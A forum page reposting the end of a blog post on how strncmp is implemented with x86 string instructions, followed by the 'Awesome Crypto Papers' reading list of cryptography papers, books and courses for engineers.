(namely, until a difference between the strings is detected). Then, the last character in the EDI string is compared to the last character in the ESI string: If they are equal — the function returns zero (ECX XORed with itself). If the character in [ESI-1] has a higher ASCII value than the one in [EDI-1] — the function returns 0xffffffff, or -1. This happens when the source string is lexicographically bigger than the destination string. Otherwise, The function returns not 0xfffffffe, which is 1. I reverse-engineered the function at work and then went to a colleague to see how he was doing. To my surprise, his IDA recognized this function as strncmp. My version didn’t. Argh. strncmp displays a nice usage of string instructions which makes it a nice function for practice. In any case, now you know how strncmp is implemented. Assembly Language Reverse Engineering Cheatsheet C Programming Language Like what you read? Give Ophir Harpaz a round of applause. From a quick cheer to a standing ovation, clap to show how much you enjoyed this story. Ophir Harpaz Cybercrime researcher at Trusteer, IBM Security. Beginner reverse engineer. Author of https://begin.re. Sursa: https://medium.com/@ophirharpaz/a-summary-of-x86-string-instructions-87566a28c20c
-
- 1
-
-
Awesome Crypto Papers A curated list of cryptography papers, articles, tutorials and howtos for non-cryptographers. Notes The goal of this list is to provide educational reading material for different levels of cryptographic knowledge. I started it because my day job onboarding engineers at Cossack Labs includes educating them in cryptographic matters and giving advise what to read on specific topics, and that involves finding the same materials repeatedly. Hopefully, it will be useful for someone else as well. It is aimed at people who are using cryptography in higher-level security systems to implement database encryption, secure sharing, end-to-end encryption in various schemes, and should understand how it works, how it fails and how it is attacked. It is not a list of notable / important / historically important papers (although many of them are here). It is not aimed at academics (who have better grasp of what they need anyway), nor it is aimed for systematic study of wanna-be cryptographers (who better follow structured approach under professional guidance). It will be extended gradually as I find something of "must-have" value. Pull requests are very welcome. Contents Introducing people to data security and cryptography Simple: cryptography for non-engineers Brief engineer-oriented introductions Specific topics Hashing - important bits on modern and classic hashes. Secret key cryptography - all things symmetric encryption. Cryptoanalysis - attacking cryptosystems. Public key cryptography: General and DLP - RSA, DH and other classic techniques. Public key cryptography: Elliptic-curve crypto - ECC, with focus on pratcial cryptosystems. Zero Knowledge Proofs - Proofs of knowledge and other non-revealing cryptosystems. Math - useful math materials in cryptographic context. Post-quantum cryptography - Cryptography in post-quantum period. Books Lectures and educational courses Online crypto challenges The list Introducing people to data security and cryptography Simple: cryptography for non-engineers Nuts and Bolts of Encryption: A Primer for Policymakers. Keys under Doormats - Or why cryptography shouldn't be backdoored, by a all-star committee of crypto researches from around the world. Brief introductions An Overview of Cryptography - By Gary C. Kessler. Using Encryption for Authentication in Large Networks - By Needham, Schroeder: this is were crypto-based auth starts. Communication Theory of Secrecy Systems - Fundamental cryptography paper by Claude Shannon. General cryptographic interest Another Look at “Provable Security” - Inquiries into formalism and naive intuition behind security proofs, by Neal Koblitz et al. The security impact of a new cryptographic library - Introducory paper on NaCl, discussing important aspects of implementing cryptography and using it as a larger building block in security systems, by Daniel J. Bernstein, Tanja Lange, Peter Schwabe. Specific topics Hashing FIPS 198-1: HMACs - The Keyed-Hash Message Authentication Code FIPS document. FIPS 202: SHA3 - SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions. Birthday problem - The best simple explanation of math behind birthday attack. On the Security of HMAC and NMAC Based on HAVAL, MD4, MD5, SHA-0 and SHA-1 - Security analysis of different legacy HMAC schemes by Jongsung Kim et al. On the Security of Randomized CBC-MAC Beyond the Birthday Paradox Limit - Security of randomized CBC-MACs and a new construction that resists birthday paradox attacks and provably reaches full security, by E. Jaulmes et al. Secret key cryptography FIPS 197 - AES FIPS document. List of proposed operation modes of AES - Maintained by NIST. Recomendation for Block Cipher modes of operation: Methods and Techniques. Stick figure guide to AES - If stuff above was a bit hard or you're looking for a good laugh. Cache timing attacks on AES - Example of designing great practical attack on cipher implementation, by Daniel J. Bernstein. Cache Attacks and Countermeasures: the Case of AES - Side channel attacks on AES, another view, by Dag Arne Osvik, Adi Shamir and Eran Tromer. Salsa20 family of stream ciphers - Broad explanation of Salsa20 security cipher by Daniel J. Bernstein. New Features of Latin Dances: Analysis of Salsa, ChaCha, and Rumba - Analysis of Salsa20 family of ciphers, by Jean-Philippe Aumasson et al. ChaCha20-Poly1305 Cipher Suites for Transport Layer Security (TLS) - IETF Draft of ciphersuite family, by Adam Langley et al. AES submission document on Rijndael - Original Rijndael proposal by Joan Daemen and Vincent Rijmen. Ongoing Research Areas in Symmetric Cryptography - Overview of ongoing research in secret key crypto and hashes by ECRYPT Network of Excellence in Cryptology. The Galois/Counter Mode of Operation (GCM) - Original paper introducing GCM, by by David A. McGrew and John Viega. The Security and Performance of the Galois/Counter Mode (GCM) of Operation - Design, analysis and security of GCM, and, more specifically, AES GCM mode, by David A. McGrew and John Viega. Cryptoanalysis Differential Cryptanalysis of Salsa20/8 - A great example of stream cipher cryptoanalysis, by Yukiyasu Tsunoo et al. Slide Attacks on a Class of Hash Functions - Applying slide attacks (typical cryptoanalysis technique for block ciphers) to hash functions, M. Gorski et al. Self-Study Course in Block Cipher Cryptanalysis - Attempt to organize the existing literature of block-cipher cryptanalysis in a way that students can use to learn cryptanalytic techniques and ways to break new algorithms, by Bruce Schneier. Statistical Cryptanalysis of Block Ciphers - By Pascal Junod. Cryptoanalysis of block ciphers and protocols - By Elad Pinhas Barkan. Public key cryptography: General and DLP New Directions in Cryptography - Seminal paper by Diffie and Hellman, introducing public key cryptography and key exchange/agreement protocol. RFC 2631: Diffie-Hellman Key Agreement - An explanation of the Diffie-Hellman methon in more engineering terms. A Method for Obtaining Digital Signatures and Public-Key Cryptosystems - Original paper introducing RSA algorithm. RSA Algorithm - Rather education explanation of every bit behind RSA. Secure Communications Over Insecure Channels - Paper by R. Merkle, predated "New directions in cryptography" though it was published after it. The Diffie-Hellman key exchange is an implementation of such a Merkle system. On the Security of Public Key Protocols - Dolev-Yao model is a formal model, used to prove properties of interactive cryptographic protocols. How to Share a Secret - A safe method for sharing secrets. Twenty Years of Attacks on the RSA Cryptosystem - Great inquiry into attacking RSA and it's internals, by Dan Boneh. Remote timing attacks are practical - An example in attacking practical crypto implementationby D. Boneh, D. Brumley. The Equivalence Between the DHP and DLP for Elliptic Curves Used in Practical Applications, Revisited - by K. Bentahar. Public key cryptography: Elliptic-curve crypto Elliptic Curve cryptography: A gentle introduction. Explain me like I'm 5: How digital signatures actually work - EdDSA explained with ease and elegance. Elliptic Curve Cryptography: finite fields and discrete logarithms. Detailed Elliptic Curve cryptography tutorial. Elliptic Curve Cryptography: ECDH and ECDSA. Elliptic Curve Cryptography: breaking security and a comparison with RSA. Elliptic Curve Cryptography: the serpentine course of a paradigm shift - Historic inquiry into development of ECC and it's adoption. Let's construct an elliptic curve: Introducing Crackpot2065 - Fine example of building up ECC from scratch. Explicit-Formulas Database - For many elliptic curve representation forms. Curve25519: new Diffie-Hellman speed records - Paper on Curve25519. Software implementation of the NIST elliptic curves over prime fields - Pracitcal example of implementing elliptic curve crypto, by M. Brown et al. High-speed high-security signatures - Seminal paper on EdDSA signatures on ed25519 curve by Daniel J. Bernstein et al. Zero Knowledge Proofs Proofs of knowledge - A pair of papers which investigate the notions of proof of knowledge and proof of computational ability, M. Bellare and O. Goldreich. How to construct zero-knowledge proof systems for NP - Classic paper by Goldreich, Micali and Wigderson. Proofs that yield nothing but their validity and a Methodology of Cryptographic protocol design - By Goldreich, Micali and Wigderson, a relative to the above. A Survey of Noninteractive Zero Knowledge Proof System and Its Applications. How to Prove a Theorem So No One Else Can Claim It - By Manuel Blum. Information Theoretic Reductions among Disclosure Problems - Brassau et al. Knowledge complexity of interactive proof systems - By GoldWasser, Micali and Rackoff. Defining computational complexity of "knowledge" within zero knowledge proofs. A Survey of Zero-Knowledge Proofs with Applications to Cryptography - Great intro on original ZKP protocols. Zero Knowledge Protocols and Small Systems - A good intro into Zero knowledge protocols. Key Management Recommendation for Key Management – Part 1: General - Methodologically very relevant document on goals and procedures of key management. Math PRIMES is in P - Unconditional deterministic polynomial-time algorithm that determines whether an input number is prime or composite. Post-quantum cryptography Post-quantum cryptography - dealing with the fallout of physics success - Brief observation of mathematical tasks that can be used to build cryptosystems secure against attacks by post-quantum computers. Post-quantum cryptography - Introduction to post-quantum cryptography. Post-quantum RSA - Daniel Bernshtein's insight how to save RSA in post-quantum period. Books That seems somewhat out of scope, isn't it? But these are books only fully available online for free. Read them as a sequence of papers if you will. A Graduate Course in Applied Cryptography - By Dan Boneh and Victor Shoup. A well-balanced introductory course into cryptography, a bit of cryptoanalysis and cryptography-related security. Analysis and design of cryptographic hash functions, MAC algorithms and block ciphers - Broad overview of design and cryptoanalysis of various ciphers and hash functions, by Bart Van Rompay. CrypTool book - Predominantly mathematically oriented information on learning, using and experimenting cryptographic procedures. Handbook of Applied Cryptography - By Alfred J. Menezes, Paul C. van Oorschot and Scott A. Vanstone. Good classical introduction into cryptography and ciphers. The joy of Cryptography - By Mike Rosulek. A lot of basic stuff covered really well. No ECC. A Computational Introduction to Number Theory and Algebra - By Victor Shoup, excellent starters book on math universally used in cryptography. Lectures and educational courses Understanding cryptography: A textbook for Students and Practitioners - Textbook, great lectures and problems to solve. Crypto101 - Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels. A Course in Cryptography - Lecture notes by Rafael Pass, Abhi Shelat. Lecture Notes on Cryptography - Famous set of lectures on cryptography by Shafi Goldwasser (MIT), M. Bellare (University of California). Introduction to Cryptography by Christof Paar - Video course by Christof Paar (University of Bochum in Germany). In english. Cryptography I - Stanford University course on Coursera, taught by prof. Dan Boneh. Cryptography II is still in development. Online crypto challenges Not exactly papers, but crypto challenges are awesome educational material. Cryptopals crypto challenges. License To the extent possible under law, author has waived all copyright and related or neighboring rights to this work. Sursa: https://github.com/pFarb/awesome-crypto-papers
-
- 1
-